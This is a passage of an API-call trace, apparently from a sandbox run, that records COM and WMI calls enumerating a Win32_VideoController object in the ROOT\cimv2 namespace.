	[0222.378] IClientSecurity:SetBlanket (This=0x1cc44e20, pProxy=0x1cc44e18, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0222.379] IUnknown:Release (This=0x1cc44e20) returned 0x2
	[0222.379] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x1
	[0222.379] CoTaskMemFree (pv=0x1b885ce0) 
	[0222.379] IUnknown:QueryInterface (in: This=0x1cc44e18, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c490 | out: ppvObject=0x1c68c490*=0x1b86e6e0) returned 0x0
	[0222.380] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c510 | out: ppvObject=0x1c68c510*=0x0) returned 0x80004002
	[0222.380] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c2a8 | out: ppvObject=0x1c68c2a8*=0x0) returned 0x80004002
	[0222.381] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x3
	[0222.381] CoGetContextToken (in: pToken=0x1c68c160 | out: pToken=0x1c68c160) returned 0x0
	[0222.381] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c120 | out: ppvObject=0x1c68c120*=0x1b86e5c8) returned 0x0
	[0222.381] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e5c8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68c150 | out: pCid=0x1c68c150*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.381] WbemLocator:IUnknown:Release (This=0x1b86e5c8) returned 0x3
	[0222.381] CoGetContextToken (in: pToken=0x1c68c130 | out: pToken=0x1c68c130) returned 0x0
	[0222.381] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x4
	[0222.381] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c248 | out: ppvObject=0x1c68c248*=0x1b86e6b0) returned 0x0
	[0222.381] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x4
	[0222.381] WbemLocator:IRpcOptions:Query (in: This=0x1b86e6b0, pPrx=0x1b86e6e0, dwProperty=2, pdwValue=0x1c68c2b8 | out: pdwValue=0x1c68c2b8) returned 0x80004002
	[0222.381] WbemLocator:IUnknown:Release (This=0x1b86e6b0) returned 0x3
	[0222.382] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x2
	[0222.382] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0222.382] CoGetContextToken (in: pToken=0x1c68c570 | out: pToken=0x1c68c570) returned 0x0
	[0222.382] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x3
	[0222.382] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x1c68c6b0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68c690 | out: ppvObject=0x1c68c690*=0x1cc44e18) returned 0x0
	[0222.382] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x3
	[0222.382] IUnknown:Release (This=0x1cc44e18) returned 0x2
	[0222.382] IUnknown:Release (This=0x1cc44e18) returned 0x1
	[0222.382] IUnknown:Release (This=0x1cc44cc8) returned 0x2
	[0222.382] CoGetContextToken (in: pToken=0x1c68ca30 | out: pToken=0x1c68ca30) returned 0x0
	[0222.382] CoGetContextToken (in: pToken=0x1c68c970 | out: pToken=0x1c68c970) returned 0x0
	[0222.382] WbemLocator:IUnknown:AddRef (This=0x1b86e6e0) returned 0x2
	[0222.382] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e6e0, riid=0x1c68cab0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x1c68ca90 | out: ppvObject=0x1c68ca90*=0x1cc44e18) returned 0x0
	[0222.383] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x2
	[0222.383] IUnknown:AddRef (This=0x1cc44e18) returned 0x3
	[0222.383] IEnumWbemClassObject:Reset (This=0x1cc44e18) returned 0x0
	[0222.383] IUnknown:Release (This=0x1cc44e18) returned 0x2
	[0222.383] CoTaskMemAlloc (cb=0x8) returned 0x1b8677a0
	[0222.383] IEnumWbemClassObject:Next (in: This=0x1cc44e18, lTimeout=-1, uCount=0x1, apObjects=0x1b8677a0, puReturned=0x1c68ccb8 | out: apObjects=0x1b8677a0*=0x1cc3eb80, puReturned=0x1c68ccb8*=0x1) returned 0x0
	[0222.385] IUnknown:QueryInterface (in: This=0x1cc3eb80, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bfe0 | out: ppvObject=0x1c68bfe0*=0x1cc3eb80) returned 0x0
	[0222.385] IUnknown:QueryInterface (in: This=0x1cc3eb80, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c060 | out: ppvObject=0x1c68c060*=0x0) returned 0x80004002
	[0222.386] IUnknown:QueryInterface (in: This=0x1cc3eb80, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bdf8 | out: ppvObject=0x1c68bdf8*=0x0) returned 0x80004002
	[0222.386] IUnknown:AddRef (This=0x1cc3eb80) returned 0x3
	[0222.386] CoGetContextToken (in: pToken=0x1c68bcb0 | out: pToken=0x1c68bcb0) returned 0x0
	[0222.386] IUnknown:QueryInterface (in: This=0x1cc3eb80, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bc70 | out: ppvObject=0x1c68bc70*=0x1cc3eb88) returned 0x0
	[0222.386] IMarshal:GetUnmarshalClass (in: This=0x1cc3eb88, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bca0 | out: pCid=0x1c68bca0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0222.386] IUnknown:Release (This=0x1cc3eb88) returned 0x3
	[0222.386] CoGetContextToken (in: pToken=0x1c68bc80 | out: pToken=0x1c68bc80) returned 0x0
	[0222.386] IUnknown:AddRef (This=0x1cc3eb80) returned 0x4
	[0222.386] IUnknown:QueryInterface (in: This=0x1cc3eb80, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bd98 | out: ppvObject=0x1c68bd98*=0x0) returned 0x80004002
	[0222.387] IUnknown:Release (This=0x1cc3eb80) returned 0x3
	[0222.387] IUnknown:Release (This=0x1cc3eb80) returned 0x2
	[0222.387] CoGetContextToken (in: pToken=0x1c68c140 | out: pToken=0x1c68c140) returned 0x0
	[0222.387] CoGetContextToken (in: pToken=0x1c68c080 | out: pToken=0x1c68c080) returned 0x0
	[0222.387] IUnknown:AddRef (This=0x1cc3eb80) returned 0x3
	[0222.387] IUnknown:QueryInterface (in: This=0x1cc3eb80, riid=0x1c68c1c0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c1a0 | out: ppvObject=0x1c68c1a0*=0x1cc3eb80) returned 0x0
	[0222.387] IUnknown:Release (This=0x1cc3eb80) returned 0x3
	[0222.387] IUnknown:Release (This=0x1cc3eb80) returned 0x2
	[0222.387] IUnknown:Release (This=0x1cc3eb80) returned 0x1
	[0222.387] CoTaskMemFree (pv=0x1b8677a0) 
	[0222.387] CoGetContextToken (in: pToken=0x1c68cac0 | out: pToken=0x1c68cac0) returned 0x0
	[0222.387] IUnknown:AddRef (This=0x1cc3eb80) returned 0x2
	[0222.387] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__GENUS", lFlags=0, pVal=0x1c68cc30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cc2c*=0, plFlavor=0x1c68cc28*=0 | out: pVal=0x1c68cc30*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68cc2c*=3, plFlavor=0x1c68cc28*=64) returned 0x0
	[0222.388] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__PATH", lFlags=0, pVal=0x1c68cbd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cbcc*=0, plFlavor=0x1c68cbc8*=0 | out: pVal=0x1c68cbd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c68cbcc*=8, plFlavor=0x1c68cbc8*=64) returned 0x0
	[0222.388] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x48
	[0222.388] CoGetObjectContext (in: riid=0x1c68cb68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb60 | out: ppv=0x1c68cb60*=0x221868) returned 0x0
	[0222.388] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cb80 | out: pAptType=0x1c68cb80*=1) returned 0x0
	[0222.388] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cc88 | out: ppvObject=0x1c68cc88*=0x0) returned 0x80004002
	[0222.388] IUnknown:Release (This=0x221868) returned 0x1
	[0222.389] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c1f0 | out: ppv=0x1c68c1f0*=0x1cc3e320) returned 0x0
	[0222.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc3e320, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf00 | out: ppvObject=0x1c68bf00*=0x0) returned 0x80004002
	[0222.389] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc3e320, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bee8 | out: ppvObject=0x1c68bee8*=0x1cc381b0) returned 0x0
	[0222.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc381b0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bdf0 | out: ppvObject=0x1c68bdf0*=0x1cc381b0) returned 0x0
	[0222.389] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc381b0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68be70 | out: ppvObject=0x1c68be70*=0x0) returned 0x80004002
	[0222.390] WbemDefPath:IUnknown:AddRef (This=0x1cc381b0) returned 0x3
	[0222.390] CoGetContextToken (in: pToken=0x1c68bac0 | out: pToken=0x1c68bac0) returned 0x0
	[0222.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc381b0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68ba80 | out: ppvObject=0x1c68ba80*=0x1b893cb0) returned 0x0
	[0222.390] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b893cb0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bab0 | out: pCid=0x1c68bab0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0222.390] WbemDefPath:IUnknown:Release (This=0x1b893cb0) returned 0x3
	[0222.390] CoGetContextToken (in: pToken=0x1c68ba90 | out: pToken=0x1c68ba90) returned 0x0
	[0222.390] WbemDefPath:IUnknown:AddRef (This=0x1cc381b0) returned 0x4
	[0222.390] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc381b0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bba8 | out: ppvObject=0x1c68bba8*=0x0) returned 0x80004002
	[0222.391] WbemDefPath:IUnknown:Release (This=0x1cc381b0) returned 0x3
	[0222.391] WbemDefPath:IUnknown:Release (This=0x1cc381b0) returned 0x2
	[0222.391] WbemDefPath:IUnknown:Release (This=0x1cc3e320) returned 0x0
	[0222.391] WbemDefPath:IUnknown:Release (This=0x1cc381b0) returned 0x1
	[0222.391] CoGetContextToken (in: pToken=0x1c68c7c0 | out: pToken=0x1c68c7c0) returned 0x0
	[0222.391] CoGetContextToken (in: pToken=0x1c68c700 | out: pToken=0x1c68c700) returned 0x0
	[0222.391] WbemDefPath:IUnknown:AddRef (This=0x1cc381b0) returned 0x2
	[0222.391] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc381b0, riid=0x1c68c840*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c820 | out: ppvObject=0x1c68c820*=0x1cc381b0) returned 0x0
	[0222.391] WbemDefPath:IUnknown:Release (This=0x1cc381b0) returned 0x2
	[0222.391] WbemDefPath:IUnknown:Release (This=0x1cc381b0) returned 0x1
	[0222.392] CoGetContextToken (in: pToken=0x1c68c940 | out: pToken=0x1c68c940) returned 0x0
	[0222.392] CoGetContextToken (in: pToken=0x1c68c880 | out: pToken=0x1c68c880) returned 0x0
	[0222.392] WbemDefPath:IUnknown:AddRef (This=0x1cc381b0) returned 0x2
	[0222.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc381b0, riid=0x1c68c9c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9a0 | out: ppvObject=0x1c68c9a0*=0x1cc381b0) returned 0x0
	[0222.392] WbemDefPath:IUnknown:Release (This=0x1cc381b0) returned 0x2
	[0222.392] WbemDefPath:IUnknown:AddRef (This=0x1cc381b0) returned 0x3
	[0222.392] WbemDefPath:IWbemPath:SetText (This=0x1cc381b0, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x0
	[0222.392] WbemDefPath:IUnknown:Release (This=0x1cc381b0) returned 0x2
	[0222.392] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cc00 | out: puCount=0x1c68cc00*=0x2) returned 0x0
	[0222.392] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cc00*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc00*=0x17, pszText=0x0) returned 0x0
	[0222.392] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cc00*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc00*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.392] CoTaskMemAlloc (cb=0x8) returned 0x1b8677a0
	[0222.392] IEnumWbemClassObject:Next (in: This=0x1cc44e18, lTimeout=-1, uCount=0x1, apObjects=0x1b8677a0, puReturned=0x1c68ccb8 | out: apObjects=0x1b8677a0*=0x0, puReturned=0x1c68ccb8*=0x0) returned 0x1
	[0222.393] CoTaskMemFree (pv=0x1b8677a0) 
	[0222.393] CoGetContextToken (in: pToken=0x1c68ca40 | out: pToken=0x1c68ca40) returned 0x0
	[0222.393] WbemLocator:IUnknown:Release (This=0x1b86e6e0) returned 0x1
	[0222.393] IUnknown:Release (This=0x1cc44e18) returned 0x0
	[0222.394] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0222.394] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0222.394] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.394] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0222.395] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.395] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__NAMESPACE", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0222.395] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0222.395] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68cd60 | out: puCount=0x1c68cd60*=0x2) returned 0x0
	[0222.395] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cd60*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cd60*=0x17, pszText=0x0) returned 0x0
	[0222.395] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68cd60*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cd60*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.395] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__CLASS", lFlags=0, pVal=0x1c68cd50*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd4c*=0, plFlavor=0x1c68cd48*=0 | out: pVal=0x1c68cd50*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c68cd4c*=8, plFlavor=0x1c68cd48*=64) returned 0x0
	[0222.395] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.395] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__CLASS", lFlags=0, pVal=0x1c68cd60*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64 | out: pVal=0x1c68cd60*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c68cd5c*=8, plFlavor=0x1c68cd58*=64) returned 0x0
	[0222.395] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.395] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0222.395] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0222.395] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.395] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc380f0, puCount=0x1c68ccf0 | out: puCount=0x1c68ccf0*=0x2) returned 0x0
	[0222.396] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68ccf0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68ccf0*=0x17, pszText=0x0) returned 0x0
	[0222.396] WbemDefPath:IWbemPath:GetText (in: This=0x1cc380f0, lFlags=4, puBuffLength=0x1c68ccf0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68ccf0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0222.396] IWbemClassObject:GetNames (in: This=0x1cc3eb80, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c68cce8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c68cce0 | out: pNames=0x1c68cce0*="\x01ƀ\x08") returned 0x0
	[0222.396] SafeArrayGetDim (psa=0x1b88be10) returned 0x1
	[0222.396] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__GENUS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c68ccdc*=3, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.396] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__CLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.396] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.396] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.397] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__DYNASTY", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.397] SysStringLen (param_1="Win32_VideoController") returned 0x15
	[0222.397] IWbemClassObject:Get (in: This=0x1cc3eb80, wszName="__RELPATH", lFlags=0, pVal=0x1c68cce0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c68ccdc*=0, plFlavor=0x1c68ccd8*=0 | out: pVal=0x1c68cce0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_VideoController.DeviceID=\"VideoController1\"", varVal2=0x0), pType=0x1c68ccdc*=8, plFlavor=0x1c68ccd8*=64) returned 0x0
	[0222.397] SysStringLen (param_1="Win32_VideoController.DeviceID=\"VideoController1\"") returned 0x31
